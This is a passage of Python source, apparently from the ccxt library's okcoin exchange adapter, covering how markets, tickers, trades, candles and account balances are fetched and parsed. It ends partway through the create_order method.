types = self.safe_value(self.options, 'fetchMarkets')
result = []
for i in range(0, len(types)):
markets = await self.fetch_markets_by_type(types[i], params)
result = self.array_concat(result, markets)
return result
def parse_markets(self, markets):
result = []
for i in range(0, len(markets)):
result.append(self.parse_market(markets[i]))
return result
def parse_market(self, market):
#
# spot markets
#
# {
# base_currency: "EOS",
# instrument_id: "EOS-OKB",
# min_size: "0.01",
# quote_currency: "OKB",
# size_increment: "0.000001",
# tick_size: "0.0001"
# }
#
# futures markets
#
# {
# instrument_id: "XRP-USD-200320",
# underlying_index: "XRP",
# quote_currency: "USD",
# tick_size: "0.0001",
# contract_val: "10",
# listing: "2020-03-06",
# delivery: "2020-03-20",
# trade_increment: "1",
# alias: "self_week",
# underlying: "XRP-USD",
# base_currency: "XRP",
# settlement_currency: "XRP",
# is_inverse: "true",
# contract_val_currency: "USD",
# }
#
# swap markets
#
# {
# instrument_id: "BSV-USD-SWAP",
# underlying_index: "BSV",
# quote_currency: "USD",
# coin: "BSV",
# contract_val: "10",
# listing: "2018-12-21T07:53:47.000Z",
# delivery: "2020-03-14T08:00:00.000Z",
# size_increment: "1",
# tick_size: "0.01",
# base_currency: "BSV",
# underlying: "BSV-USD",
# settlement_currency: "BSV",
# is_inverse: "true",
# contract_val_currency: "USD"
# }
#
# options markets
#
# {
# instrument_id: 'BTC-USD-200327-4000-C',
# underlying: 'BTC-USD',
# settlement_currency: 'BTC',
# contract_val: '0.1000',
# option_type: 'C',
# strike: '4000',
# tick_size: '0.0005',
# lot_size: '1.0000',
# listing: '2019-12-25T08:30:36.302Z',
# delivery: '2020-03-27T08:00:00.000Z',
# state: '2',
# trading_start_time: '2019-12-25T08:30:36.302Z',
# timestamp: '2020-03-13T08:05:09.456Z',
# }
#
id = self.safe_string(market, 'instrument_id')
optionType = self.safe_value(market, 'option_type')
contractVal = self.safe_number(market, 'contract_val')
contract = contractVal is not None
futuresAlias = self.safe_string(market, 'alias')
marketType = 'spot'
spot = not contract
option = (optionType is not None)
future = not option and (futuresAlias is not None)
swap = contract and not future and not option
baseId = self.safe_string(market, 'base_currency')
quoteId = self.safe_string(market, 'quote_currency')
settleId = self.safe_string(market, 'settlement_currency')
if option:
underlying = self.safe_string(market, 'underlying')
parts = underlying.split('-')
baseId = self.safe_string(parts, 0)
quoteId = self.safe_string(parts, 1)
marketType = 'option'
elif future:
baseId = self.safe_string(market, 'underlying_index')
marketType = 'futures'
elif swap:
marketType = 'swap'
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
settle = self.safe_currency_code(settleId)
symbol = base + '/' + quote
expiryDatetime = self.safe_string(market, 'delivery')
expiry = None
strike = self.safe_value(market, 'strike')
if contract:
symbol = symbol + ':' + settle
if future or option:
if future:
expiryDatetime += 'T00:00:00Z'
expiry = self.parse8601(expiryDatetime)
symbol = symbol + '-' + self.yymmdd(expiry)
if option:
symbol = symbol + ':' + strike + ':' + optionType
optionType = 'call' if (optionType == 'C') else 'put'
lotSize = self.safe_number_2(market, 'lot_size', 'trade_increment')
minPrice = self.safe_string(market, 'tick_size')
minAmountString = self.safe_string_2(market, 'min_size', 'base_min_size')
minAmount = self.parse_number(minAmountString)
minCost = None
if (minAmount is not None) and (minPrice is not None):
minCost = self.parse_number(Precise.string_mul(minPrice, minAmountString))
fees = self.safe_value_2(self.fees, marketType, 'trading', {})
maxLeverageString = self.safe_string(market, 'max_leverage', '1')
maxLeverage = self.parse_number(Precise.string_max(maxLeverageString, '1'))
precisionPrice = self.parse_number(minPrice)
return self.extend(fees, {
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'settle': settle,
'baseId': baseId,
'quoteId': quoteId,
'settleId': settleId,
'type': marketType,
'spot': spot,
'margin': spot and (Precise.string_gt(maxLeverageString, '1')),
'swap': swap,
'future': future,
'futures': future, # deprecated
'option': option,
'active': True,
'contract': contract,
'linear': (quote == settle) if contract else None,
'inverse': (base == settle) if contract else None,
'contractSize': contractVal,
'expiry': expiry,
'expiryDatetime': self.iso8601(expiry),
'strike': strike,
'optionType': optionType,
'precision': {
'amount': self.safe_number(market, 'size_increment', lotSize),
'price': precisionPrice,
},
'limits': {
'leverage': {
'min': self.parse_number('1'),
'max': self.parse_number(maxLeverage),
},
'amount': {
'min': minAmount,
'max': None,
},
'price': {
'min': precisionPrice,
'max': None,
},
'cost': {
'min': minCost,
'max': None,
},
},
'info': market,
})
async def fetch_markets_by_type(self, type, params={}):
if type == 'option':
underlying = await self.optionGetUnderlying(params)
result = []
for i in range(0, len(underlying)):
response = await self.optionGetInstrumentsUnderlying({
'underlying': underlying[i],
})
#
# options markets
#
# [
# {
# instrument_id: 'BTC-USD-200327-4000-C',
# underlying: 'BTC-USD',
# settlement_currency: 'BTC',
# contract_val: '0.1000',
# option_type: 'C',
# strike: '4000',
# tick_size: '0.0005',
# lot_size: '1.0000',
# listing: '2019-12-25T08:30:36.302Z',
# delivery: '2020-03-27T08:00:00.000Z',
# state: '2',
# trading_start_time: '2019-12-25T08:30:36.302Z',
# timestamp: '2020-03-13T08:05:09.456Z',
# },
# ]
#
result = self.array_concat(result, response)
return self.parse_markets(result)
elif (type == 'spot') or (type == 'futures') or (type == 'swap'):
method = type + 'GetInstruments'
response = await getattr(self, method)(params)
#
# spot markets
#
# [
# {
# base_currency: "EOS",
# instrument_id: "EOS-OKB",
# min_size: "0.01",
# quote_currency: "OKB",
# size_increment: "0.000001",
# tick_size: "0.0001"
# }
# ]
#
# futures markets
#
# [
# {
# instrument_id: "XRP-USD-200320",
# underlying_index: "XRP",
# quote_currency: "USD",
# tick_size: "0.0001",
# contract_val: "10",
# listing: "2020-03-06",
# delivery: "2020-03-20",
# trade_increment: "1",
# alias: "self_week",
# underlying: "XRP-USD",
# base_currency: "XRP",
# settlement_currency: "XRP",
# is_inverse: "true",
# contract_val_currency: "USD",
# }
# ]
#
# swap markets
#
# [
# {
# instrument_id: "BSV-USD-SWAP",
# underlying_index: "BSV",
# quote_currency: "USD",
# coin: "BSV",
# contract_val: "10",
# listing: "2018-12-21T07:53:47.000Z",
# delivery: "2020-03-14T08:00:00.000Z",
# size_increment: "1",
# tick_size: "0.01",
# base_currency: "BSV",
# underlying: "BSV-USD",
# settlement_currency: "BSV",
# is_inverse: "true",
# contract_val_currency: "USD"
# }
# ]
#
return self.parse_markets(response)
else:
raise NotSupported(self.id + ' fetchMarketsByType() does not support market type ' + type)
async def fetch_currencies(self, params={}):
"""
fetches all available currencies on an exchange
:param dict params: extra parameters specific to the okcoin api endpoint
:returns dict: an associative dictionary of currencies
"""
# despite that their docs say these endpoints are public:
# https://www.okex.com/api/account/v3/withdrawal/fee
# https://www.okex.com/api/account/v3/currencies
# it will still reply with {"code":30001, "message": "OK-ACCESS-KEY header is required"}
# if you attempt to access it without authentication
if not self.check_required_credentials(False):
if self.options['warnOnFetchCurrenciesWithoutAuthorization']:
raise ExchangeError(self.id + ' fetchCurrencies() is a private API endpoint that requires authentication with API keys. Set the API keys on the exchange instance or exchange.options["warnOnFetchCurrenciesWithoutAuthorization"] = False to suppress self warning message.')
return None
else:
response = await self.accountGetCurrencies(params)
#
# [
# {
# name: '',
# currency: 'BTC',
# can_withdraw: '1',
# can_deposit: '1',
# min_withdrawal: '0.0100000000000000'
# },
# ]
#
result = {}
for i in range(0, len(response)):
currency = response[i]
id = self.safe_string(currency, 'currency')
code = self.safe_currency_code(id)
name = self.safe_string(currency, 'name')
canDeposit = self.safe_integer(currency, 'can_deposit')
canWithdraw = self.safe_integer(currency, 'can_withdraw')
depositEnabled = (canDeposit == 1)
withdrawEnabled = (canWithdraw == 1)
active = True if (canDeposit and canWithdraw) else False
result[code] = {
'id': id,
'code': code,
'info': currency,
'type': None,
'name': name,
'active': active,
'deposit': depositEnabled,
'withdraw': withdrawEnabled,
'fee': None, # todo: redesign
'precision': self.parse_number('0.00000001'),
'limits': {
'amount': {'min': None, 'max': None},
'withdraw': {
'min': self.safe_number(currency, 'min_withdrawal'),
'max': None,
},
},
}
return result
async def fetch_order_book(self, symbol, limit=None, params={}):
"""
fetches information on open orders with bid(buy) and ask(sell) prices, volumes and other data
:param str symbol: unified symbol of the market to fetch the order book for
:param int|None limit: the maximum amount of order book entries to return
:param dict params: extra parameters specific to the okcoin api endpoint
:returns dict: A dictionary of `order book structures <https://docs.ccxt.com/en/latest/manual.html#order-book-structure>` indexed by market symbols
"""
await self.load_markets()
market = self.market(symbol)
method = market['type'] + 'GetInstrumentsInstrumentId'
method += 'Depth' if (market['type'] == 'swap') else 'Book'
request = {
'instrument_id': market['id'],
}
if limit is not None:
request['size'] = limit # max 200
response = await getattr(self, method)(self.extend(request, params))
#
# spot
#
# { asks: [["0.02685268", "0.242571", "1"],
# ["0.02685493", "0.164085", "1"],
# ...
# ["0.02779", "1.039", "1"],
# ["0.027813", "0.0876", "1"] ],
# bids: [["0.02684052", "10.371849", "1"],
# ["0.02684051", "3.707", "4"],
# ...
# ["0.02634963", "0.132934", "1"],
# ["0.02634962", "0.264838", "2"] ],
# timestamp: "2018-12-17T20:24:16.159Z" }
#
# swap
#
# {
# "asks":[
# ["916.21","94","0","1"]
# ],
# "bids":[
# ["916.1","15","0","1"]
# ],
# "time":"2021-04-16T02:04:48.282Z"
# }
#
timestamp = self.parse8601(self.safe_string_2(response, 'timestamp', 'time'))
return self.parse_order_book(response, symbol, timestamp)
def parse_ticker(self, ticker, market=None):
#
# { best_ask: "0.02665472",
# best_bid: "0.02665221",
# instrument_id: "ETH-BTC",
# product_id: "ETH-BTC",
# last: "0.02665472",
# ask: "0.02665472", # missing in the docs
# bid: "0.02665221", # not mentioned in the docs
# open_24h: "0.02645482",
# high_24h: "0.02714633",
# low_24h: "0.02614109",
# base_volume_24h: "572298.901923",
# timestamp: "2018-12-17T21:20:07.856Z",
# quote_volume_24h: "15094.86831261" }
#
timestamp = self.parse8601(self.safe_string(ticker, 'timestamp'))
marketId = self.safe_string(ticker, 'instrument_id')
market = self.safe_market(marketId, market, '-')
symbol = market['symbol']
last = self.safe_string(ticker, 'last')
open = self.safe_string(ticker, 'open_24h')
return self.safe_ticker({
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': self.safe_string(ticker, 'high_24h'),
'low': self.safe_string(ticker, 'low_24h'),
'bid': self.safe_string(ticker, 'best_bid'),
'bidVolume': self.safe_string(ticker, 'best_bid_size'),
'ask': self.safe_string(ticker, 'best_ask'),
'askVolume': self.safe_string(ticker, 'best_ask_size'),
'vwap': None,
'open': open,
'close': last,
'last': last,
'previousClose': None,
'change': None,
'percentage': None,
'average': None,
'baseVolume': self.safe_string(ticker, 'base_volume_24h'),
'quoteVolume': self.safe_string(ticker, 'quote_volume_24h'),
'info': ticker,
}, market)
async def fetch_ticker(self, symbol, params={}):
"""
fetches a price ticker, a statistical calculation with the information calculated over the past 24 hours for a specific market
:param str symbol: unified symbol of the market to fetch the ticker for
:param dict params: extra parameters specific to the okcoin api endpoint
:returns dict: a `ticker structure <https://docs.ccxt.com/en/latest/manual.html#ticker-structure>`
"""
await self.load_markets()
market = self.market(symbol)
method = market['type'] + 'GetInstrumentsInstrumentIdTicker'
request = {
'instrument_id': market['id'],
}
response = await getattr(self, method)(self.extend(request, params))
#
# { best_ask: "0.02665472",
# best_bid: "0.02665221",
# instrument_id: "ETH-BTC",
# product_id: "ETH-BTC",
# last: "0.02665472",
# ask: "0.02665472",
# bid: "0.02665221",
# open_24h: "0.02645482",
# high_24h: "0.02714633",
# low_24h: "0.02614109",
# base_volume_24h: "572298.901923",
# timestamp: "2018-12-17T21:20:07.856Z",
# quote_volume_24h: "15094.86831261" }
#
return self.parse_ticker(response)
async def fetch_tickers_by_type(self, type, symbols=None, params={}):
await self.load_markets()
method = type + 'GetInstrumentsTicker'
response = await getattr(self, method)(params)
result = {}
for i in range(0, len(response)):
ticker = self.parse_ticker(response[i])
symbol = ticker['symbol']
result[symbol] = ticker
return self.filter_by_array(result, 'symbol', symbols)
async def fetch_tickers(self, symbols=None, params={}):
"""
fetches price tickers for multiple markets, statistical calculations with the information calculated over the past 24 hours each market
:param [str]|None symbols: unified symbols of the markets to fetch the ticker for, all market tickers are returned if not assigned
:param dict params: extra parameters specific to the okcoin api endpoint
:returns dict: an array of `ticker structures <https://docs.ccxt.com/en/latest/manual.html#ticker-structure>`
"""
defaultType = self.safe_string_2(self.options, 'fetchTickers', 'defaultType')
type = self.safe_string(params, 'type', defaultType)
return await self.fetch_tickers_by_type(type, symbols, self.omit(params, 'type'))
def parse_trade(self, trade, market=None):
#
# fetchTrades(public)
#
# spot trades
#
# {
# time: "2018-12-17T23:31:08.268Z",
# timestamp: "2018-12-17T23:31:08.268Z",
# trade_id: "409687906",
# price: "0.02677805",
# size: "0.923467",
# side: "sell"
# }
#
# futures trades, swap trades
#
# {
# trade_id: "1989230840021013",
# side: "buy",
# price: "92.42",
# qty: "184", # missing in swap markets
# size: "5", # missing in futures markets
# timestamp: "2018-12-17T23:26:04.613Z"
# }
#
# fetchOrderTrades(private)
#
# spot trades, margin trades
#
# {
# "created_at":"2019-03-15T02:52:56.000Z",
# "exec_type":"T", # whether the order is taker or maker
# "fee":"0.00000082",
# "instrument_id":"BTC-USDT",
# "ledger_id":"3963052721",
# "liquidity":"T", # whether the order is taker or maker
# "order_id":"2482659399697408",
# "price":"3888.6",
# "product_id":"BTC-USDT",
# "side":"buy",
# "size":"0.00055306",
# "timestamp":"2019-03-15T02:52:56.000Z"
# },
#
# futures trades, swap trades
#
# {
# "trade_id":"197429674631450625",
# "instrument_id":"EOS-USD-SWAP",
# "order_id":"6a-7-54d663a28-0",
# "price":"3.633",
# "order_qty":"1.0000",
# "fee":"-0.000551",
# "created_at":"2019-03-21T04:41:58.0Z", # missing in swap trades
# "timestamp":"2019-03-25T05:56:31.287Z", # missing in futures trades
# "exec_type":"M", # whether the order is taker or maker
# "side":"short", # "buy" in futures trades
# }
#
symbol = None
marketId = self.safe_string(trade, 'instrument_id')
base = None
quote = None
if marketId in self.markets_by_id:
market = self.markets_by_id[marketId]
symbol = market['symbol']
base = market['base']
quote = market['quote']
elif marketId is not None:
parts = marketId.split('-')
numParts = len(parts)
if numParts == 2:
baseId, quoteId = parts
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
else:
symbol = marketId
if (symbol is None) and (market is not None):
symbol = market['symbol']
base = market['base']
quote = market['quote']
timestamp = self.parse8601(self.safe_string_2(trade, 'timestamp', 'created_at'))
priceString = self.safe_string(trade, 'price')
amountString = self.safe_string_2(trade, 'size', 'qty')
amountString = self.safe_string(trade, 'order_qty', amountString)
takerOrMaker = self.safe_string_2(trade, 'exec_type', 'liquidity')
if takerOrMaker == 'M':
takerOrMaker = 'maker'
elif takerOrMaker == 'T':
takerOrMaker = 'taker'
side = self.safe_string(trade, 'side')
feeCostString = self.safe_string(trade, 'fee')
fee = None
if feeCostString is not None:
feeCurrency = base if (side == 'buy') else quote
fee = {
# fee is either a positive number(invitation rebate)
# or a negative number(transaction fee deduction)
# therefore we need to invert the fee
# more about it https://github.com/ccxt/ccxt/issues/5909
'cost': Precise.string_neg(feeCostString),
'currency': feeCurrency,
}
orderId = self.safe_string(trade, 'order_id')
return self.safe_trade({
'info': trade,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'id': self.safe_string_2(trade, 'trade_id', 'ledger_id'),
'order': orderId,
'type': None,
'takerOrMaker': takerOrMaker,
'side': side,
'price': priceString,
'amount': amountString,
'cost': None,
'fee': fee,
}, market)
async def fetch_trades(self, symbol, since=None, limit=None, params={}):
"""
get the list of most recent trades for a particular symbol
:param str symbol: unified symbol of the market to fetch trades for
:param int|None since: timestamp in ms of the earliest trade to fetch
:param int|None limit: the maximum amount of trades to fetch
:param dict params: extra parameters specific to the okcoin api endpoint
:returns [dict]: a list of `trade structures <https://docs.ccxt.com/en/latest/manual.html?#public-trades>`
"""
await self.load_markets()
market = self.market(symbol)
method = market['type'] + 'GetInstrumentsInstrumentIdTrades'
if (limit is None) or (limit > 100):
limit = 100 # maximum = default = 100
request = {
'instrument_id': market['id'],
'limit': limit,
# from: 'id',
# to: 'id',
}
response = await getattr(self, method)(self.extend(request, params))
#
# spot markets
#
# [
# {
# time: "2018-12-17T23:31:08.268Z",
# timestamp: "2018-12-17T23:31:08.268Z",
# trade_id: "409687906",
# price: "0.02677805",
# size: "0.923467",
# side: "sell"
# }
# ]
#
# futures markets, swap markets
#
# [
# {
# trade_id: "1989230840021013",
# side: "buy",
# price: "92.42",
# qty: "184", # missing in swap markets
# size: "5", # missing in futures markets
# timestamp: "2018-12-17T23:26:04.613Z"
# }
# ]
#
return self.parse_trades(response, market, since, limit)
def parse_ohlcv(self, ohlcv, market=None):
#
# spot markets
#
# {
# close: "0.02684545",
# high: "0.02685084",
# low: "0.02683312",
# open: "0.02683894",
# time: "2018-12-17T20:28:00.000Z",
# volume: "101.457222"
# }
#
# futures markets
#
# [
# 1545072720000,
# 0.3159,
# 0.3161,
# 0.3144,
# 0.3149,
# 22886,
# 725179.26172331,
# ]
#
if isinstance(ohlcv, list):
numElements = len(ohlcv)
volumeIndex = 6 if (numElements > 6) else 5
timestamp = self.safe_value(ohlcv, 0)
if isinstance(timestamp, str):
timestamp = self.parse8601(timestamp)
return [
timestamp, # timestamp
self.safe_number(ohlcv, 1), # Open
self.safe_number(ohlcv, 2), # High
self.safe_number(ohlcv, 3), # Low
self.safe_number(ohlcv, 4), # Close
# self.safe_number(ohlcv, 5), # Quote Volume
# self.safe_number(ohlcv, 6), # Base Volume
self.safe_number(ohlcv, volumeIndex), # Volume, okex will return base volume in the 7th element for future markets
]
else:
return [
self.parse8601(self.safe_string(ohlcv, 'time')),
self.safe_number(ohlcv, 'open'), # Open
self.safe_number(ohlcv, 'high'), # High
self.safe_number(ohlcv, 'low'), # Low
self.safe_number(ohlcv, 'close'), # Close
self.safe_number(ohlcv, 'volume'), # Base Volume
]
async def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
"""
fetches historical candlestick data containing the open, high, low, and close price, and the volume of a market
:param str symbol: unified symbol of the market to fetch OHLCV data for
:param str timeframe: the length of time each candle represents
:param int|None since: timestamp in ms of the earliest candle to fetch
:param int|None limit: the maximum amount of candles to fetch
:param dict params: extra parameters specific to the okcoin api endpoint
:returns [[int]]: A list of candles ordered as timestamp, open, high, low, close, volume
"""
await self.load_markets()
market = self.market(symbol)
duration = self.parse_timeframe(timeframe)
request = {
'instrument_id': market['id'],
'granularity': self.timeframes[timeframe],
}
options = self.safe_value(self.options, 'fetchOHLCV', {})
defaultType = self.safe_string(options, 'type', 'Candles') # Candles or HistoryCandles
type = self.safe_string(params, 'type', defaultType)
params = self.omit(params, 'type')
method = market['type'] + 'GetInstrumentsInstrumentId' + type
if type == 'Candles':
if since is not None:
if limit is not None:
request['end'] = self.iso8601(self.sum(since, limit * duration * 1000))
request['start'] = self.iso8601(since)
else:
if limit is not None:
now = self.milliseconds()
request['start'] = self.iso8601(now - limit * duration * 1000)
request['end'] = self.iso8601(now)
elif type == 'HistoryCandles':
if market['option']:
raise NotSupported(self.id + ' fetchOHLCV() does not have ' + type + ' for ' + market['type'] + ' markets')
if since is not None:
if limit is None:
limit = 300 # default
request['start'] = self.iso8601(self.sum(since, limit * duration * 1000))
request['end'] = self.iso8601(since)
else:
if limit is not None:
now = self.milliseconds()
request['end'] = self.iso8601(now - limit * duration * 1000)
request['start'] = self.iso8601(now)
response = await getattr(self, method)(self.extend(request, params))
#
# spot markets
#
# [
# {
# close: "0.02683401",
# high: "0.02683401",
# low: "0.02683401",
# open: "0.02683401",
# time: "2018-12-17T23:47:00.000Z",
# volume: "0"
# },
# {
# close: "0.02684545",
# high: "0.02685084",
# low: "0.02683312",
# open: "0.02683894",
# time: "2018-12-17T20:28:00.000Z",
# volume: "101.457222"
# }
# ]
#
# futures
#
# [
# [
# 1545090660000,
# 0.3171,
# 0.3174,
# 0.3171,
# 0.3173,
# 1648,
# 51930.38579450868
# ],
# [
# 1545072720000,
# 0.3159,
# 0.3161,
# 0.3144,
# 0.3149,
# 22886,
# 725179.26172331
# ]
# ]
#
return self.parse_ohlcvs(response, market, timeframe, since, limit)
def parse_account_balance(self, response):
#
# account
#
# [
# {
# balance: 0,
# available: 0,
# currency: "BTC",
# hold: 0
# },
# {
# balance: 0,
# available: 0,
# currency: "ETH",
# hold: 0
# }
# ]
#
# spot
#
# [
# {
# frozen: "0",
# hold: "0",
# id: "2149632",
# currency: "BTC",
# balance: "0.0000000497717339",
# available: "0.0000000497717339",
# holds: "0"
# },
# {
# frozen: "0",
# hold: "0",
# id: "2149632",
# currency: "ICN",
# balance: "0.00000000925",
# available: "0.00000000925",
# holds: "0"
# }
# ]
#
result = {
'info': response,
'timestamp': None,
'datetime': None,
}
for i in range(0, len(response)):
balance = response[i]
currencyId = self.safe_string(balance, 'currency')
code = self.safe_currency_code(currencyId)
account = self.account()
account['total'] = self.safe_string(balance, 'balance')
account['used'] = self.safe_string(balance, 'hold')
account['free'] = self.safe_string(balance, 'available')
result[code] = account
return self.safe_balance(result)
def parse_margin_balance(self, response):
#
# [
# {
# "currency:BTC": {
# "available":"0",
# "balance":"0",
# "borrowed":"0",
# "can_withdraw":"0",
# "frozen":"0",
# "hold":"0",
# "holds":"0",
# "lending_fee":"0"
# },
# "currency:USDT": {
# "available":"100",
# "balance":"100",
# "borrowed":"0",
# "can_withdraw":"100",
# "frozen":"0",
# "hold":"0",
# "holds":"0",
# "lending_fee":"0"
# },
# "instrument_id":"BTC-USDT",
# "liquidation_price":"0",
# "product_id":"BTC-USDT",
# "risk_rate":""
# },
# ]
#
result = {
'info': response,
'timestamp': None,
'datetime': None,
}
for i in range(0, len(response)):
balance = response[i]
marketId = self.safe_string(balance, 'instrument_id')
market = self.safe_value(self.markets_by_id, marketId)
symbol = None
if market is None:
baseId, quoteId = marketId.split('-')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
else:
symbol = market['symbol']
omittedBalance = self.omit(balance, [
'instrument_id',
'liquidation_price',
'product_id',
'risk_rate',
'margin_ratio',
'maint_margin_ratio',
'tiers',
])
keys = list(omittedBalance.keys())
accounts = {}
for k in range(0, len(keys)):
key = keys[k]
marketBalance = balance[key]
if key.find(':') >= 0:
parts = key.split(':')
currencyId = parts[1]
code = self.safe_currency_code(currencyId)
account = self.account()
account['total'] = self.safe_string(marketBalance, 'balance')
account['used'] = self.safe_string(marketBalance, 'hold')
account['free'] = self.safe_string(marketBalance, 'available')
accounts[code] = account
else:
raise NotSupported(self.id + ' margin balance response format has changed!')
result[symbol] = self.safe_balance(accounts)
return result
def parse_futures_balance(self, response):
#
# {
# "info":{
# "eos":{
# "auto_margin":"0",
# "contracts": [
# {
# "available_qty":"40.37069445",
# "fixed_balance":"0",
# "instrument_id":"EOS-USD-190329",
# "margin_for_unfilled":"0",
# "margin_frozen":"0",
# "realized_pnl":"0",
# "unrealized_pnl":"0"
# },
# {
# "available_qty":"40.37069445",
# "fixed_balance":"14.54895721",
# "instrument_id":"EOS-USD-190628",
# "margin_for_unfilled":"0",
# "margin_frozen":"10.64042157",
# "realized_pnl":"-3.90853564",
# "unrealized_pnl":"-0.259"
# },
# ],
# "equity":"50.75220665",
# "margin_mode":"fixed",
# "total_avail_balance":"40.37069445"
# },
# }
# }
#
# their root field name is "info", so our info will contain their info
result = {
'info': response,
'timestamp': None,
'datetime': None,
}
info = self.safe_value(response, 'info', {})
ids = list(info.keys())
for i in range(0, len(ids)):
id = ids[i]
code = self.safe_currency_code(id)
balance = self.safe_value(info, id, {})
account = self.account()
totalAvailBalance = self.safe_string(balance, 'total_avail_balance')
if self.safe_string(balance, 'margin_mode') == 'fixed':
contracts = self.safe_value(balance, 'contracts', [])
free = totalAvailBalance
for i in range(0, len(contracts)):
contract = contracts[i]
fixedBalance = self.safe_string(contract, 'fixed_balance')
realizedPnl = self.safe_string(contract, 'realized_pnl')
marginFrozen = self.safe_string(contract, 'margin_frozen')
marginForUnfilled = self.safe_string(contract, 'margin_for_unfilled')
margin = Precise.string_sub(Precise.string_sub(Precise.string_add(fixedBalance, realizedPnl), marginFrozen), marginForUnfilled)
free = Precise.string_add(free, margin)
account['free'] = free
else:
realizedPnl = self.safe_string(balance, 'realized_pnl')
unrealizedPnl = self.safe_string(balance, 'unrealized_pnl')
marginFrozen = self.safe_string(balance, 'margin_frozen')
marginForUnfilled = self.safe_string(balance, 'margin_for_unfilled')
positive = Precise.string_add(Precise.string_add(totalAvailBalance, realizedPnl), unrealizedPnl)
account['free'] = Precise.string_sub(Precise.string_sub(positive, marginFrozen), marginForUnfilled)
# it may be incorrect to use total, free and used for swap accounts
account['total'] = self.safe_string(balance, 'equity')
result[code] = account
return self.safe_balance(result)
def parse_swap_balance(self, response):
#
# {
# "info": [
# {
# "equity":"3.0139",
# "fixed_balance":"0.0000",
# "instrument_id":"EOS-USD-SWAP",
# "margin":"0.5523",
# "margin_frozen":"0.0000",
# "margin_mode":"crossed",
# "margin_ratio":"1.0913",
# "realized_pnl":"-0.0006",
# "timestamp":"2019-03-25T03:46:10.336Z",
# "total_avail_balance":"3.0000",
# "unrealized_pnl":"0.0145"
# }
# ]
# }
#
# their root field name is "info", so our info will contain their info
result = {'info': response}
timestamp = None
info = self.safe_value(response, 'info', [])
for i in range(0, len(info)):
balance = info[i]
marketId = self.safe_string(balance, 'instrument_id')
symbol = marketId
if marketId in self.markets_by_id:
symbol = self.markets_by_id[marketId]['symbol']
balanceTimestamp = self.parse8601(self.safe_string(balance, 'timestamp'))
timestamp = balanceTimestamp if (timestamp is None) else max(timestamp, balanceTimestamp)
account = self.account()
# it may be incorrect to use total, free and used for swap accounts
account['total'] = self.safe_string(balance, 'equity')
account['free'] = self.safe_string(balance, 'total_avail_balance')
result[symbol] = account
result['timestamp'] = timestamp
result['datetime'] = self.iso8601(timestamp)
return self.safe_balance(result)
async def fetch_balance(self, params={}):
"""
query for balance and get the amount of funds available for trading or funds locked in orders
:param dict params: extra parameters specific to the okcoin api endpoint
:returns dict: a `balance structure <https://docs.ccxt.com/en/latest/manual.html?#balance-structure>`
"""
defaultType = self.safe_string_2(self.options, 'fetchBalance', 'defaultType')
type = self.safe_string(params, 'type', defaultType)
if type is None:
raise ArgumentsRequired(self.id + " fetchBalance() requires a type parameter(one of 'account', 'spot', 'margin', 'futures', 'swap')")
await self.load_markets()
suffix = 'Wallet' if (type == 'account') else 'Accounts'
method = type + 'Get' + suffix
query = self.omit(params, 'type')
response = await getattr(self, method)(query)
#
# account
#
# [
# {
# balance: 0,
# available: 0,
# currency: "BTC",
# hold: 0
# },
# {
# balance: 0,
# available: 0,
# currency: "ETH",
# hold: 0
# }
# ]
#
# spot
#
# [
# {
# frozen: "0",
# hold: "0",
# id: "2149632",
# currency: "BTC",
# balance: "0.0000000497717339",
# available: "0.0000000497717339",
# holds: "0"
# },
# {
# frozen: "0",
# hold: "0",
# id: "2149632",
# currency: "ICN",
# balance: "0.00000000925",
# available: "0.00000000925",
# holds: "0"
# }
# ]
#
# margin
#
# [
# {
# "currency:BTC": {
# "available":"0",
# "balance":"0",
# "borrowed":"0",
# "can_withdraw":"0",
# "frozen":"0",
# "hold":"0",
# "holds":"0",
# "lending_fee":"0"
# },
# "currency:USDT": {
# "available":"100",
# "balance":"100",
# "borrowed":"0",
# "can_withdraw":"100",
# "frozen":"0",
# "hold":"0",
# "holds":"0",
# "lending_fee":"0"
# },
# "instrument_id":"BTC-USDT",
# "liquidation_price":"0",
# "product_id":"BTC-USDT",
# "risk_rate":""
# },
# ]
#
# futures
#
# {
# "info":{
# "eos":{
# "auto_margin":"0",
# "contracts": [
# {
# "available_qty":"40.37069445",
# "fixed_balance":"0",
# "instrument_id":"EOS-USD-190329",
# "margin_for_unfilled":"0",
# "margin_frozen":"0",
# "realized_pnl":"0",
# "unrealized_pnl":"0"
# },
# {
# "available_qty":"40.37069445",
# "fixed_balance":"14.54895721",
# "instrument_id":"EOS-USD-190628",
# "margin_for_unfilled":"0",
# "margin_frozen":"10.64042157",
# "realized_pnl":"-3.90853564",
# "unrealized_pnl":"-0.259"
# },
# ],
# "equity":"50.75220665",
# "margin_mode":"fixed",
# "total_avail_balance":"40.37069445"
# },
# }
# }
#
# swap
#
# {
# "info": [
# {
# "equity":"3.0139",
# "fixed_balance":"0.0000",
# "instrument_id":"EOS-USD-SWAP",
# "margin":"0.5523",
# "margin_frozen":"0.0000",
# "margin_mode":"crossed",
# "margin_ratio":"1.0913",
# "realized_pnl":"-0.0006",
# "timestamp":"2019-03-25T03:46:10.336Z",
# "total_avail_balance":"3.0000",
# "unrealized_pnl":"0.0145"
# }
# ]
# }
#
return self.parse_balance_by_type(type, response)
def parse_balance_by_type(self, type, response):
if (type == 'account') or (type == 'spot'):
return self.parse_account_balance(response)
elif type == 'margin':
return self.parse_margin_balance(response)
elif type == 'futures':
return self.parse_futures_balance(response)
elif type == 'swap':
return self.parse_swap_balance(response)
raise NotSupported(self.id + " fetchBalance does not support the '" + type + "' type(the type must be one of 'account', 'spot', 'margin', 'futures', 'swap')")
async def create_order(self, symbol, type, side, amount, price=None, params={}):
"""
create a trade order
:param str symbol: unified symbol of the market to create an order in
:param str type: 'market' or 'limit'
:param str side: 'buy' or 'sell'
:param float amount: how much of currency you want to trade in units of base currency
:param float price: the price at which the order is to be fullfilled, in units of the quote currency, ignored in market orders
:param dict params: extra parameters specific to the okcoin api endpoint
:returns dict: an `order structure <https://docs.ccxt.com/en/latest/manual.html#order-structure>`
"""
await self.load_markets()
market = self.market(symbol)
request = {
'instrument_id': market['id'],
